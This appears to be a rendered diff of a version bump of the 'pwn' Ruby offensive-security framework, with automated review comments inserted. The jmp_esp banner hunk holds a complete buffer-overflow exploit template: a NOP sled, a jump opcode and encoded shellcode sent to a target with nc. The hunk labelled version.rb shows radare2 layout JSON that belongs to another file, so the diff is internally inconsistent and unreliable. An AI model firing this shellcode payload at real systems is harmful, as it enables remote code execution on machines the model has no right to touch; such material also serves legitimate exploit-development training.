pwn 0.5.36 → 0.5.37
- checksums.yaml +4 -4
- data/README.md +3 -3
- data/lib/pwn/banner/jmp_esp.rb +2 -2
- data/lib/pwn/banner/radare2.rb +3 -9
- data/lib/pwn/plugins/assembly.rb +2 -2
- data/lib/pwn/version.rb +1 -1
- data/third_party/r2-pwn-layout +1 -0
- metadata +2 -1
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: bb526bdd28c2934926712cd69973337e9a3736350a1b914f5c3233dd2f7584d7
|
4
|
+
data.tar.gz: b808fff5507ebb35d94f535a196679ff95ff41255ed509efd2fe465aacefc500
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: 9218c49c6d11ff327daa6b40c57753ea5a5ce5d84915c79369f822b03101cdc14fb6e4641ab91b6a8a6765fb59a5431b8739af7088d84eb06138597c5351d5d2
|
7
|
+
data.tar.gz: 32e89872dc6d39000bf9bb50abcc581a4387db007d137ef613b90b8516c3d0153e54cb40d922254c58b737a5705dca593a76935c6031ea2783fe26f26cfdbb88
|
data/README.md
CHANGED
@@ -37,7 +37,7 @@ $ cd /opt/pwn
|
|
37
37
|
$ ./install.sh
|
38
38
|
$ ./install.sh ruby-gem
|
39
39
|
$ pwn
|
40
|
-
pwn[v0.5.
|
40
|
+
pwn[v0.5.37]:001 >>> PWN.help
|
41
41
|
```
|
42
42
|
|
43
43
|
[![Installing the pwn Security Automation Framework](https://raw.githubusercontent.com/0dayInc/pwn/master/documentation/pwn_install.png)](https://youtu.be/G7iLUY4FzsI)
|
@@ -52,7 +52,7 @@ $ rvm use ruby-3.3.0@pwn
|
|
52
52
|
$ gem uninstall --all --executables pwn
|
53
53
|
$ gem install --verbose pwn
|
54
54
|
$ pwn
|
55
|
-
pwn[v0.5.
|
55
|
+
pwn[v0.5.37]:001 >>> PWN.help
|
56
56
|
```
|
57
57
|
|
58
58
|
If you're using a multi-user install of RVM do:
|
@@ -62,7 +62,7 @@ $ rvm use ruby-3.3.0@pwn
|
|
62
62
|
$ rvmsudo gem uninstall --all --executables pwn
|
63
63
|
$ rvmsudo gem install --verbose pwn
|
64
64
|
$ pwn
|
65
|
-
pwn[v0.5.
|
65
|
+
pwn[v0.5.37]:001 >>> PWN.help
|
66
66
|
```
|
67
67
|
|
68
68
|
PWN periodically upgrades to the latest version of Ruby which is reflected in `/opt/pwn/.ruby-version`. The easiest way to upgrade to the latest version of Ruby from a previous PWN installation is to run the following script:
|
data/lib/pwn/banner/jmp_esp.rb
CHANGED
@@ -12,10 +12,10 @@ module PWN
|
|
12
12
|
public_class_method def self.get
|
13
13
|
'
|
14
14
|
#!/bin/bash
|
15
|
-
|
15
|
+
crash=$(printf \'\x90%.0s\' {1..1337})
|
16
16
|
asm_ops=\'\xff\xe4\'
|
17
17
|
sh_code=\'\x6a\x14\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x0c\x09\x11\xb5\x83\xeb\xfc\xe2\xf4\x3d\xd2\xe6\x56\x5f\x4a\x42\xdf\x0e\x80\xf0\x05\x6a\xc4\x91\xee\x52\x5b\x79\xb7\x0c\x0c\x28\xdf\x1c\x58\x41\x3c\xed\x63\x77\xed\xc1\x89\x98\xf4\x08\xba\x15\x05\x6a\xc4\x91\xf6\xbc\x6f\xdc\x35\x9f\x50\x7b\x8a\x54\xc4\x91\xfc\x75\xf1\x79\x9a\x23\x7a\x79\xdd\x23\x6b\x78\xdb\x85\xea\x41\xe6\x85\xe8\xa1\xbe\xc1\x89\x11\xb5\'
|
18
|
-
pwn="${
|
18
|
+
pwn="${crash}${sh_code}${asm_ops}"
|
19
19
|
echo -en $pwn | nc $TARGET $PORT
|
20
20
|
'.red
|
21
21
|
rescue StandardError => e
|
data/lib/pwn/banner/radare2.rb
CHANGED
@@ -11,15 +11,9 @@ module PWN
|
|
11
11
|
|
12
12
|
public_class_method def self.get
|
13
13
|
'
|
14
|
-
$
|
15
|
-
|
16
|
-
|
17
|
-
[0x7f000070776e]> afl ~..
|
18
|
-
[0x7f000070776e]> db main
|
19
|
-
[0x7f000070776e]> db
|
20
|
-
[0x7f000070776e]> dc
|
21
|
-
[0x7f000070776e]> pdg
|
22
|
-
[0x7f000070776e]> v
|
14
|
+
$ target_arm_bin="/usr/bin/id";
|
15
|
+
$ alias r2="setarch $(uname -m) -R r2 -AA -c \"v /opt/pwn/third_party/r2-pwn-layout\""
|
16
|
+
$ r2 -c "db (0x`readelf -S $target_arm_bin | grep text | awk "{print $NF}"`)+0x4+0x00000328" -c "ood" -c "dc" -c "v" $target_arm_bin
|
23
17
|
'.yellow
|
24
18
|
rescue StandardError => e
|
25
19
|
raise e
|
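Review bot: The third command on the new line 16 nests `awk "{print $NF}"` inside the backtick substitution of an already double-quoted `-c "db (0x...`...`)..."` argument, so as written `$NF` undergoes expansion by the invoking shell (empty unless a shell variable NF happens to be set) rather than being passed to awk, and the address fed to `db` would be wrong if someone pastes the banner verbatim. If this banner is meant as a copy-pasteable example, single-quote the awk program in the Ruby source as `awk \'{print $NF}\'`, which is the same `\'` escape the jmp_esp banner already relies on inside its single-quoted string. `self.get` continues past the hunk; its closing `end` is not shown.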
data/lib/pwn/plugins/assembly.rb
CHANGED
@@ -22,7 +22,7 @@ module PWN
|
|
22
22
|
|
23
23
|
raise 'ERROR: opcodes parameter is required.' if opcodes.nil?
|
24
24
|
|
25
|
-
case arch
|
25
|
+
case arch.to_s.downcase
|
26
26
|
when 'i386', 'i686', 'x86'
|
27
27
|
arch_obj = Metasm::Ia32.new(endian)
|
28
28
|
when 'amd64', 'x86_64'
|
@@ -82,7 +82,7 @@ module PWN
|
|
82
82
|
|
83
83
|
raise 'ERROR: asm parameter is required.' if asm.nil?
|
84
84
|
|
85
|
-
case arch
|
85
|
+
case arch.to_s.downcase
|
86
86
|
when 'i386', 'i686', 'x86'
|
87
87
|
arch_obj = Metasm::Ia32.new(endian)
|
88
88
|
when 'amd64', 'x86_64'
|
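Review bot: The normalization `arch.to_s.downcase` added on the new line 25 is repeated verbatim on line 85 of the second hunk, so the two `case` statements can drift apart the next time one of them gains a variant; a small private helper keeps them in step, e.g. `private_class_method def self.normalize_arch(arch)` / `arch.to_s.downcase.strip` / `end`, with both sites becoming `case normalize_arch(arch)` (the `.strip` also tolerates a trailing space from a CLI flag). Note that `.to_s` turns a nil `arch` into `''`, which silently reaches whatever `else` branch follows instead of failing like the `opcodes.nil?` guard two lines above; if `arch` has no default, a matching `raise 'ERROR: arch parameter is required.' if arch.nil?` next to that guard would make the two parameters behave the same. Both enclosing methods start and end outside their hunks, so the signatures and the `else` branches are not visible here.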
data/lib/pwn/version.rb
CHANGED
@@ -0,0 +1 @@
|
|
1
|
+
{"Title":"Disassembly","Cmd":"pd","x":0,"y":1,"w":100,"h":38},{"Title":"Stack","Cmd":"pxq 256","x":0,"y":39,"w":100,"h":16},{"Title":"Hexdump","Cmd":"xc $r*16","x":0,"y":55,"w":100,"h":16},{"Title":"Registers","Cmd":"dr","x":100,"y":1,"w":35,"h":70},{"Title":"Function Calls","Cmd":"aflm","x":135,"y":1,"w":44,"h":70}
|
metadata
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: pwn
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 0.5.
|
4
|
+
version: 0.5.37
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
7
|
- 0day Inc.
|
@@ -2185,6 +2185,7 @@ files:
|
|
2185
2185
|
- spec/spec_helper.rb
|
2186
2186
|
- third_party/.gitkeep
|
2187
2187
|
- third_party/http-request-headers-fields-large.txt
|
2188
|
+
- third_party/r2-pwn-layout
|
2188
2189
|
- update_pwn.sh
|
2189
2190
|
- upgrade_ruby.sh
|
2190
2191
|
- vagrant/provisioners/apache2.sh
|